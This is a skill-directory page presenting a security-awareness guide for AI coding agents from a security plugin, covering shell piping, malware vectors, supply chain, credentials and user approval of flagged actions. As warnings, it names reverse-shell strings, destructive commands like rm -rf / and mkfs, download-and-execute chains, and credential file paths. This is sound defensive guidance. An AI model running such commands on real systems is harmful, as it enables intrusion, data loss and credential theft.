What is Remote Code Execution in this context and why is it dangerous?

RCE refers to running code received from external sources. It is dangerous because untrusted or malicious code can take full control of a system; avoid piping content directly to shells and always inspect code before execution.

How should I handle credentials securely?

Store secrets in secret managers or environment variables, never hardcode them or commit them to version control, and rotate credentials regularly.

What should I do if I suspect a supply-chain risk?

Review package provenance, pin versions, verify checksums, assess post-install scripts, and replace with trusted sources. Engage security review and document findings.

security-awareness

Scanned

npx machina-cli add skill avast/sage/security-awareness --openclaw

Files (1)

SKILL.md

2.8 KB

Security Awareness

You are working in an environment protected by Sage, a security plugin. Be mindful of these security considerations when executing commands and fetching URLs.

Remote Code Execution

Never pipe untrusted content to a shell (curl | bash, wget | sh). Always download first, inspect, then execute.
Avoid eval() on untrusted input in any language.
Be cautious with source or . commands on remote scripts.

Malware Distribution Vectors

Executables downloaded from the internet (.exe, .msi, .bat, .ps1, .scr) should be treated as potentially malicious.
Raw paste sites (pastebin.com/raw, paste.ee/r) are commonly used to host payloads and C2 commands.
Direct IP address URLs (e.g., http://192.168.1.1/payload) may indicate C2 infrastructure.

Command Injection Patterns

Watch for reverse shell patterns: /dev/tcp/, nc -e, bash -i >& /dev/.
Destructive commands like rm -rf /, mkfs, dd if=, and shred can cause irreversible data loss.
Be wary of download-and-execute chains: curl ... && chmod +x && ./.

Supply Chain Security

Verify package names carefully — typosquatting is common (e.g., colourama vs colorama).
Check package popularity and maintenance status before installing.
Prefer pinned versions over latest/wildcard versions.
Review post-install scripts when possible.

Credential Handling

Never hardcode secrets, API keys, or passwords in source code.
Use environment variables or secret managers for sensitive values.
Never commit .env files, credentials, or private keys to version control.
Be cautious with commands that read or transmit sensitive files (/etc/passwd, .ssh/, id_rsa).

Safe URL Handling

Prefer HTTPS over HTTP for all external requests.
Validate URLs before fetching — check the domain is expected.
Be cautious with URL redirects that might lead to malicious destinations.
Don't fetch URLs from untrusted sources without verification.

File Permissions

Avoid chmod 777 — use the minimum permissions needed.
Be cautious with NOPASSWD in sudoers configurations.
Don't create world-writable files or directories in shared locations.

Sage Flagged Actions

When Sage flags a tool call (as opposed to blocking it outright), you must present the details to the user and wait for their explicit approval before calling sage_approve. Never auto-approve a flagged action on your own — the user must decide.

Source

git clone https://github.com/avast/sage/blob/main/skills/security-awareness/SKILL.mdView on GitHub

Overview

Security Awareness provides practical best practices to prevent common attack vectors in command execution, URL handling, credential management, and supply chain safety. It covers remote code execution risks, malware distribution vectors, and how to avoid damaging patterns like reverse shells and command injections.

How This Skill Works

The skill codifies safety patterns and checks for everyday development and deployment tasks. It emphasizes avoiding dangerous chains such as piping untrusted content to a shell and using eval on untrusted input, while promoting URL validation, secret management, and thorough supply-chain review to reduce risk.

When to Use It

Auditing scripts and automation before deployment to catch dangerous patterns.
Fetching external data or payloads from the internet for processing.
Managing and rotating API keys, passwords, and other credentials in development and CI/CD.
Evaluating package dependencies and verifying reproducible builds to prevent supply-chain issues.
Investigating suspicious commands or malware distribution attempts in code or CI environments.

Quick Start

Step 1: Identify high-risk patterns such as curl | bash, wget | sh, and eval on input.
Step 2: Replace with safe alternatives: download then inspect, use secret managers, pin versions, and validate URLs.
Step 3: Enforce checks in CI/CD and require explicit user approval for any flagged action via Sage.

Best Practices

Never pipe untrusted content to a shell; download first, inspect, then execute.
Avoid eval or similar dynamic execution on untrusted input; use safe parsing and sandboxing when possible.
Validate URLs and enforce HTTPS; review redirects and domain reputation before fetching.
Use secret managers or environment variables for credentials; never commit secrets to code or VCS.
Pin dependencies and review post-install scripts; verify package provenance and maintainance before install.

Example Use Cases

A deployment script uses curl http://example.com/payload | bash; the action is flagged and requires inspection.
Code uses eval on user-provided input; refactored to safe, explicit parsing and sandboxed execution.
Dependency install uses a non-pinned or wildcard version, raising typosquatting and supply-chain concerns.
API keys or passwords stored in a .env file and committed to version control.
Executable payloads downloaded from paste sites (pastebin/raw) or direct IP URLs and executed.

Frequently Asked Questions

Add this skill to your agents